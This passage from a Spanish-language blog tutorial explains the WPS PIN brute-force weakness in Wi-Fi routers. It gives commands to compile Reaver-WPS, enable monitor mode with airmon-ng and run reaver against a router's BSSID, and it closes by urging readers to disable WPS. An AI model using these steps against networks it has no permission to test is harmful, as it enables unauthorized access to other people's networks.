- Mediante el botón de pulsar para conectar (necesitamos acceso físico al dispositivo)
- Configurando en el router (interfaz web normalmente) el PIN de la tarjeta WIFI que queremos conectar.
- Mediante el PIN del router (esto es realmente el problema y lo que permite realizar ataques de fuerza bruta)
- Los "listos", como el mío, necesitan los 8 dígitos para saber si la clave es correcta.
- Los "tontos", que sólo con los 4 primeros dígitos ya te dicen si el PIN va bien o no, lo que reduce considerablemente el crackeo.
Crackeo propiamente dicho
La herramienta usada para esto se llama Reaver-WPS.(desde Github) La última versión en este momento es la 1.4. Nos la descargamos, extraemos y compilamos.
tar -xvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
sudo make installa |
Ejecutarlo y que funcione es tal que así, suponiendo que nuestra tarjeta wifi es wlan0 y que tenemos el paquete aircrack-ng instalado (para airmon-ng). Recordamos que el BSSID es el MAC inhalámbrico del router.
airmon-ng start wlan0
sudo ./reaver -i mon0 -b BSSID |
Y ya está. Nos ponemos a esperar que le llevará unas horitas. Necesita una buena señal para que no se pierdan los paquetes, si no tendrá que estar reenviándolos todo el rato y perderemos mucho tiempo, en vuestras casas con vuestros routers no tendréis problema.
Recordad, ¡desactivad el WPS! Aún no se sabe de ninguna solución ni parche. Un saludo!
Comentarios